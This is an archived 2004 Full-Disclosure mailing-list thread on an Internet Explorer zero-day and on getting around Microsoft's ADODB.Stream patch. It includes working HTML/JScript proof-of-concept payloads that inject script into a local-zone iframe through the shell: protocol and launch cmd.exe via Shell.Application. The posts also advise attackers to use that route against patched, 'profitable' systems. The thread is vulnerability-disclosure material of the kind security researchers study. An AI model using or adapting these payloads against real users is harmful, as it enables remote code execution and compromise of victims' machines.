[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH

To: "Jelmer" <jkuperus@xxxxxxxxx>, <liudieyu@xxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>, <NTBugtraq@xxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: RE: [Full-Disclosure] THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
From: <liudieyu@xxxxxxxxxxxxx>
Date: Sat, 3 Jul 2004 15:24:55 -0000


at the very beginning, using shell.application is not "another" way - it's
actually the only solution available for the general public. most of
profitable systems to crack today have norton.antivirus.enterprise.xxxx
installed - which means MS-ITS& Adodb.Stream are disabled. i must admit,
norton.antivirus did stop the insider exploit - this time. 

so, a real malicious attacker with normal intel would never simply copy the
public exploit(which involves MS-ITS and ADODB.STREAM) and send it to his
targets - he'll use shell.application instead of adodb.stream.

the most weired thing is the following fact:
norton is securing windows faster than microsoft.
(the latter is OS PRODUCER, while the former is ANTIVIRUS)

Jelmer <jkuperus@xxxxxxxxx> said:

> Well it's not quite as easy as you make it sound
> I think you only took a look at http-equiv's example I posted to full
> disclosure and based your post on that. You see this:
> 
> 
> --snip--
> 
> <iframe src="c:\windows\web\tip.htm"
> style="width:400px;height:200px;"></iframe>
> 
> <textarea id="code" style="display:none;">
>   injected.
>   <script language="JScript" DEFER>
>     alert('attempting injection');
>     var obj=new ActiveXObject("Shell.Application");
>     obj.ShellExecute("cmd.exe","/c pause");
>   </script>
> </textarea>
> 
> <script language="javascript">
>     
>     function doit() {
>       document.frames[0].document.body.insertAdjacentHTML('afterBegin',
> document.all.code.value);
>     }
>     setTimeout("doit()", 2000);
> </script>
> 
> --snip--
> 
> Doesn't work, It gives an access denied exception
> But this..
> 
> 
> --snip--
> 
> <iframe src="shell:windows\web\tip.htm"
> style="width:400px;height:200px;"></iframe>
> 
> 
> <textarea id="code" style="display:none;">
>   injected.
>   <script language="JScript" DEFER>
>     alert('attempting injection');
>     var obj=new ActiveXObject("Shell.Application");
>     obj.ShellExecute("cmd.exe","/c pause");
>   </script>
> </textarea>
> 
> 
> <script language="javascript">
>     
>     function doit() {
>       document.frames[0].document.body.insertAdjacentHTML('afterBegin',
> document.all.code.value);
>     }
>     setTimeout("doit()", 2000);
> </script>
> 
> --snip--
> 
> 
> ..does, notice the subtle difference.
> The iframe in the 2nd example is set to shell:windows\web\tip.htm 
> Instead of the hard coded c:\windows\web\tip.htm
> And it works. It was http-equiv whom probably by a mixture of luck and gut
> instinct thru experience found this out when we where doing some mailing
> back and forth to tackle some unrelated problem
> If you'd actually tried to exploit it you would have known this
> 
> 
> 
> -----Original Message-----
> From: full-disclosure-admin@xxxxxxxxxxxxxxxx
> [mailto:full-disclosure-admin@xxxxxxxxxxxxxxxx] On Behalf Of
> liudieyu@xxxxxxxxxxxxx
> Sent: zaterdag 3 juli 2004 3:28
> To: bugtraq@xxxxxxxxxxxxxxxxx; NTBugtraq@xxxxxxxxxxxxxxxxxxxxxx;
> full-disclosure@xxxxxxxxxxxxxxxx
> Subject: [Full-Disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER
> TODAY'S PATCH
> 
> 
> 
> FROM: Liu Die Yu - http://umbrella.name/
> TO  : bugtraq@xxxxxxxxxxxxxxxxx, NTBugtraq@xxxxxxxxxxxxxxxxxxxxxx,
> full-disclosure@xxxxxxxxxxxxxxxx
> SUBJ: THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
> DATE: 2004/07/03 UTC+800
> BODY:
> 
> [background]
> the latest 0day remote compromise exploit for internet explorer was found
> being used in the wild. :-)
> 
> "the-insider" exploit was first noticed by the-insider:
> http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos
> ure_message-2004060050
> and then documented by jelmer:
> http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclos
> ure_message-2004060124
> http://62.131.86.111/analysis.htm 
> 
> microsoft just released:
> Critical Update for Microsoft Data Access Components - Disable ADODB.Stream
> object from Internet Explorer (KB870669)
> http://www.microsoft.com/downloads/details.aspx?FamilyID=4D056748-C538-46F6-
> B7C8-2FBFD0D237E3&DisplayLang=en
> which kills the old exploit.
> 
> [FIX FOR THE PATCH]
> use Shell.Application instead.
> 
> [service]
> both "attack service"(finding bugs) and "defense service"(securing systems):
> http://umbrella.name/
> 
> [greetings]
> malware( http://www.malware.com/ ) who found Shell.Application.
> 
> [signature]
> LIUDIEYU
> liudieyu AT umbrella . name
> 
> 
> 
> 



-- 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- RE: [Full-Disclosure] THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
  - From: Jelmer

Prev by Date: RE: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability
Next by Date: [Full-Disclosure] Successful in blocking all known exploits
Previous by thread: RE: [Full-Disclosure] THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
Next by thread: [Full-Disclosure] What a difference a char makes...
Index(es):
- Date
- Thread